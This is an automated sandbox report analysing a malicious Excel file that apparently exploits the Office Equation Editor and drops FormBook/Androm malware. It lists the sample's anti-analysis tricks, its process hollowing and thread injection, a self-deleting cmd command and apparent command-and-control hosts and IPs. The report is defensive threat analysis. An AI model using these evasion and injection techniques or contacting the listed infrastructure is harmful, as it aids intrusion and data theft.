              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000002118604 second address: 000000000211860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000211899E second address: 00000000021189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Odhbljup.exeRDTSC instruction interceptor: First address: 0000000003BC8604 second address: 0000000003BC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Odhbljup.exeRDTSC instruction interceptor: First address: 0000000003BC899E second address: 0000000003BC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Odhbljup.exeRDTSC instruction interceptor: First address: 0000000003A18604 second address: 0000000003A1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Odhbljup.exeRDTSC instruction interceptor: First address: 0000000003A1899E second address: 0000000003A189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Contains functionality to detect sleep reduction / modificationsShow sources
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D734
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0042D734
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0042D734
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2812Thread sleep time: -180000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2128Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Odhbljup.exe TID: 1184Thread sleep time: -240000s >= -30000s
              Source: C:\Users\user\Odhbljup.exe TID: 1712Thread sleep time: -120000s >= -30000s
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D734
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0042D734
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966E8 rdtsc
              Source: C:\Users\Public\vbc.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
              Source: C:\Users\user\Odhbljup.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
              Source: C:\Users\user\Odhbljup.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
              Source: explorer.exe, 00000006.00000000.544520820.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004244DC GetSystemInfo,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00459820 LoadLibraryA,GetProcAddress,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD26F8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
              Source: C:\Users\user\Odhbljup.exeProcess queried: DebugPort
              Source: C:\Users\user\Odhbljup.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966E8 rdtsc
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\user\Odhbljup.exeProcess token adjusted: Debug
              Source: C:\Users\user\Odhbljup.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 87.98.234.164 80
              Source: C:\Windows\explorer.exeDomain query: www.urzeczenie.com
              Maps a DLL or memory area into another processShow sources
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 870000
              Queues an APC in another process (thread injection)Show sources
              Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1764
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
              Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
              Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
              Source: C:\Users\Public\vbc.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
              Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,GetACP,
              Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
              Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
              Source: C:\Users\Public\vbc.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,GetACP,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,GetACP,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Odhbljup.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00409F7C GetLocalTime,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0043DD6C GetVersion,

              Stealing of Sensitive Information:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsShared Modules1Application Shimming1Application Shimming1Obfuscated Files or Information3LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Process Injection512Software Packing1Security Account ManagerSystem Information Discovery116SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Registry Run Keys / Startup Folder1DLL Side-Loading1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery341SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection512Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532894 Sample: 7009.xlsx Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 50 www.voucheraja.com 2->50 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 13 other signatures 2->76 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 31 2->15         started        signatures3 process4 dnsIp5 56 13.250.31.113, 49167, 80 AMAZON-02US United States 10->56 38 C:\Users\user\AppData\Local\...\binso[1].exe, PE32 10->38 dropped 40 C:\Users\Public\vbc.exe, PE32 10->40 dropped 100 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->100 17 vbc.exe 1 15 10->17         started        42 C:\Users\user\Desktop\~$7009.xlsx, data 15->42 dropped file6 signatures7 process8 dnsIp9 44 prigmg.am.files.1drv.com 17->44 46 onedrive.live.com 17->46 48 am-files.fe.1drv.com 17->48 36 C:\Users\user\Odhbljup.exe, PE32 17->36 dropped 78 Multi AV Scanner detection for dropped file 17->78 80 Machine Learning detection for dropped file 17->80 82 Drops PE files to the user root directory 17->82 84 6 other signatures 17->84 22 explorer.exe 1 2 17->22 injected file10 signatures11 process12 dnsIp13 52 urzeczenie.com 87.98.234.164, 49181, 80 OVHFR France 22->52 54 www.urzeczenie.com 22->54 86 System process connects to network (likely due to code injection or exploit) 22->86 26 Odhbljup.exe 13 22->26         started        30 NAPSTAT.EXE 22->30         started        32 Odhbljup.exe 15 22->32         started        signatures14 process15 dnsIp16 58 prigmg.am.files.1drv.com 26->58 60 onedrive.live.com 26->60 62 am-files.fe.1drv.com 26->62 88 Multi AV Scanner detection for dropped file 26->88 90 Machine Learning detection for dropped file 26->90 92 Tries to detect virtualization through RDTSC time measurements 26->92 94 Contains functionality to detect sleep reduction / modifications 26->94 96 Modifies the context of a thread in another process (thread injection) 30->96 98 Maps a DLL or memory area into another process 30->98 34 cmd.exe 30->34         started        64 prigmg.am.files.1drv.com 32->64 66 onedrive.live.com 32->66 68 am-files.fe.1drv.com 32->68 signatures17 process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              7009.xlsx35%VirustotalBrowse
              7009.xlsx40%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\Odhbljup.exe100%Joe Sandbox ML
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe36%ReversingLabsWin32.Backdoor.Androm
              C:\Users\user\Odhbljup.exe36%ReversingLabsWin32.Backdoor.Androm
              C:\Users\Public\vbc.exe36%ReversingLabsWin32.Backdoor.Androm

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.3.vbc.exe.315eec.144.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7e610.131.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cfdb70.107.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7909c.165.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1ce50f4.106.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.3392d0.164.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.33154c.246.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.310e80.52.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1ce5494.128.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.3152c8.112.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.339a08.101.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              7.3.Odhbljup.exe.1d710a4.42.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1d0a114.111.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              10.3.Odhbljup.exe.1cebffc.148.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1d04008.221.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.31d1ac.249.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d79768.59.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.310c38.39.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.318e6c.162.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d86b78.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              10.3.Odhbljup.exe.1cf3014.139.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.331ca4.264.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31d598.276.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31d4f0.273.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d70008.71.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cf058c.74.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d6459c.33.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cdcd68.0.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1ced598.275.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d64370.24.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cefb84.27.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d71894.9.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d81dfc.272.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d64d5c.90.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31914c.181.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cfe2fc.126.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d81b18.61.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31cf84.239.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.3292e0.46.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d81f44.282.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cec8e4.217.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7e368.15.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cfe610.133.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d8af00.134.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              10.3.Odhbljup.exe.1ce0b08.34.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.33af00.133.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.30cd68.0.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7e610.133.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.331c54.260.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cec008.207.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1d119ac.49.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              7.3.Odhbljup.exe.1d792e0.43.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31d4f4.268.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.331ef4.277.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.319308.5.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.318b08.37.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.318d98.156.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1d010fc.238.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7e2fc.126.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d60e80.53.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.32d0a8.94.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d685dc.151.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31943c.205.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cec8e4.215.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1cece70.235.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.315494.130.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1ced594.281.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.31932c.197.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d6d4f0.271.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.32e0c8.115.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d68b08.36.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1ce0b08.35.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.321414.55.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.3143b0.68.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d71894.11.unpack100%AviraTR/Patched.Ren.GenDownload File
              10.3.Odhbljup.exe.1d06b78.18.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              10.3.Odhbljup.exe.1cf9f90.13.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.329c94.206.unpack100%AviraTR/Patched.Ren.GenDownload File
              7.3.Odhbljup.exe.1d7f438.209.unpack100%AviraTR/Patched.Ren.GenDownload File
              4.3.vbc.exe.329f90.12.unpack100%AviraTR/Patched.Ren.GenDownload File
